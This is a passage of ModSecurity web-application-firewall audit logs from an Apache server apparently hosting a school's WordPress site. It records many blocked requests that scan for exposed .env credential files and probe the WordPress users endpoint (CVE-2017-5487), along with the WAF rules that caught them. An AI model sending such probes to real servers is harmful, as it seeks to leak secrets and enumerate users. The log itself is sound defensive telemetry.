"CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748877040196254 3133 (- - -) Stopwatch2: 1748877040196254 3133; combined=1483, p1=512, p2=942, p3=0, p4=0, p5=29, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf73370d-Z-- --d90a8c18-A-- [02/Jun/2025:22:27:31 +0700] aD3C4-6eDjh4wF4csdukuQAAAI4 103.236.140.4 47000 103.236.140.4 8181 --d90a8c18-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.212.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.212.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --d90a8c18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d90a8c18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748878051667367 791 (- - -) Stopwatch2: 1748878051667367 791; combined=373, p1=334, p2=0, p3=0, p4=0, p5=39, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d90a8c18-Z-- --a645246a-A-- [02/Jun/2025:22:28:21 +0700] aD3DFX8VMK8tZef_-m8EOQAAAEw 103.236.140.4 50114 103.236.140.4 8181 --a645246a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.255.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.255.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a645246a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a645246a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748878101655712 2219 (- - -) Stopwatch2: 1748878101655712 2219; combined=882, p1=287, p2=573, p3=0, p4=0, p5=22, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a645246a-Z-- --5ae2bd59-A-- [02/Jun/2025:22:28:40 +0700] aD3DKO6eDjh4wF4csduleAAAAJU 103.236.140.4 51326 103.236.140.4 8181 --5ae2bd59-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.212.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.212.94 X-Forwarded-Proto: https Connection: close User-Agent: HTMLParser/1.6 Accept-Charset: utf-8 --5ae2bd59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ae2bd59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748878120691966 626 (- - -) Stopwatch2: 1748878120691966 626; combined=215, p1=190, p2=0, p3=0, p4=0, p5=25, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ae2bd59-Z-- --6b80d61d-A-- [02/Jun/2025:22:44:23 +0700] aD3G10A6be0-boUGPH23RwAAANc 103.236.140.4 53646 103.236.140.4 8181 --6b80d61d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 114.9.16.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 114.9.16.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6b80d61d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b80d61d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748879063340512 3110 (- - -) Stopwatch2: 1748879063340512 3110; combined=1340, p1=418, p2=888, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b80d61d-Z-- --71cf946f-A-- [02/Jun/2025:22:45:43 +0700] aD3HJ0A6be0-boUGPH23TwAAAMo 103.236.140.4 53692 103.236.140.4 8181 --71cf946f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 120.78.123.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 120.78.123.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71cf946f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71cf946f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748879143704855 3022 (- - -) Stopwatch2: 1748879143704855 3022; combined=1347, p1=486, p2=825, p3=0, p4=0, p5=36, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71cf946f-Z-- --b160f86c-A-- [02/Jun/2025:22:56:02 +0700] aD3JktG4Cudp_oIcbnPn4gAAAAA 103.236.140.4 53958 103.236.140.4 8181 --b160f86c-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3872.0 Safari/537.36 Edg/78.0.244.0 Accept-Charset: utf-8 --b160f86c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b160f86c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748879762610566 678 (- - -) Stopwatch2: 1748879762610566 678; combined=278, p1=237, p2=0, p3=0, p4=0, p5=40, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b160f86c-Z-- --39436203-A-- [02/Jun/2025:23:15:23 +0700] aD3OG38VMK8tZef_-m8MOwAAAFY 103.236.140.4 54746 103.236.140.4 8181 --39436203-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.20.83.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.20.83.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --39436203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39436203-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748880923782631 2862 (- - -) Stopwatch2: 1748880923782631 2862; combined=1280, p1=416, p2=835, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39436203-Z-- --29791a62-A-- [02/Jun/2025:23:25:42 +0700] aD3Qhn8VMK8tZef_-m8MdgAAAEU 103.236.140.4 55016 103.236.140.4 8181 --29791a62-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Mi Note 3 Build/OPM1.171019.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6858 MicroMessenger/7.0.5.1440(0x27000537) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --29791a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29791a62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748881542713509 892 (- - -) Stopwatch2: 1748881542713509 892; combined=373, p1=332, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29791a62-Z-- --9eec7738-A-- [02/Jun/2025:23:52:20 +0700] aD3WxO6eDjh4wF4csdutDAAAAJc 103.236.140.4 56472 103.236.140.4 8181 --9eec7738-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.28.124 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.28.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9eec7738-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9eec7738-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748883140820639 882 (- - -) Stopwatch2: 1748883140820639 882; combined=398, p1=342, p2=0, p3=0, p4=0, p5=55, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9eec7738-Z-- --10831061-A-- [02/Jun/2025:23:57:57 +0700] aD3YFUA6be0-boUGPH24RwAAAMg 103.236.140.4 56626 103.236.140.4 8181 --10831061-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.49 Safari/537.36 Accept-Charset: utf-8 --10831061-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10831061-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748883477647389 981 (- - -) Stopwatch2: 1748883477647389 981; combined=408, p1=364, p2=0, p3=0, p4=0, p5=43, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10831061-Z-- --990b6314-A-- [03/Jun/2025:00:04:08 +0700] aD3ZiEA6be0-boUGPH24fQAAAMs 103.236.140.4 57330 103.236.140.4 8181 --990b6314-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.202.250.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.202.250.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --990b6314-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --990b6314-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748883848768075 33359 (- - -) Stopwatch2: 1748883848768075 33359; combined=60791, p1=497, p2=970, p3=0, p4=0, p5=29681, sr=80, sw=0, l=0, gc=29643 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --990b6314-Z-- --33d6111e-A-- [03/Jun/2025:00:16:09 +0700] aD3cWUA6be0-boUGPH240QAAAMM 103.236.140.4 57782 103.236.140.4 8181 --33d6111e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --33d6111e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d6111e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884569885803 677 (- - -) Stopwatch2: 1748884569885803 677; combined=254, p1=220, p2=0, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33d6111e-Z-- --77a6bb67-A-- [03/Jun/2025:00:16:10 +0700] aD3cWn8VMK8tZef_-m8OBwAAAEU 103.236.140.4 57784 103.236.140.4 8181 --77a6bb67-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --77a6bb67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77a6bb67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570066373 649 (- - -) Stopwatch2: 1748884570066373 649; combined=241, p1=214, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77a6bb67-Z-- --69f2af40-A-- [03/Jun/2025:00:16:10 +0700] aD3cWn8VMK8tZef_-m8OCAAAAEc 103.236.140.4 57786 103.236.140.4 8181 --69f2af40-B-- GET /app/config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --69f2af40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69f2af40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570247160 673 (- - -) Stopwatch2: 1748884570247160 673; combined=276, p1=244, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69f2af40-Z-- --eefdca50-A-- [03/Jun/2025:00:16:10 +0700] aD3cWkA6be0-boUGPH240gAAAMQ 103.236.140.4 57788 103.236.140.4 8181 --eefdca50-B-- GET /staging/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --eefdca50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eefdca50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570427916 654 (- - -) Stopwatch2: 1748884570427916 654; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eefdca50-Z-- --bdc0a91a-A-- [03/Jun/2025:00:16:10 +0700] aD3cWn8VMK8tZef_-m8OCQAAAFQ 103.236.140.4 57790 103.236.140.4 8181 --bdc0a91a-B-- GET /admin-app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --bdc0a91a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdc0a91a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570608659 680 (- - -) Stopwatch2: 1748884570608659 680; combined=263, p1=224, p2=0, p3=0, p4=0, p5=39, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdc0a91a-Z-- --69067745-A-- [03/Jun/2025:00:16:10 +0700] aD3cWn8VMK8tZef_-m8OCgAAAE0 103.236.140.4 57792 103.236.140.4 8181 --69067745-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --69067745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69067745-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570789453 641 (- - -) Stopwatch2: 1748884570789453 641; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69067745-Z-- --e74db529-A-- [03/Jun/2025:00:16:10 +0700] aD3cWkA6be0-boUGPH240wAAANQ 103.236.140.4 57794 103.236.140.4 8181 --e74db529-B-- GET /app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --e74db529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e74db529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: 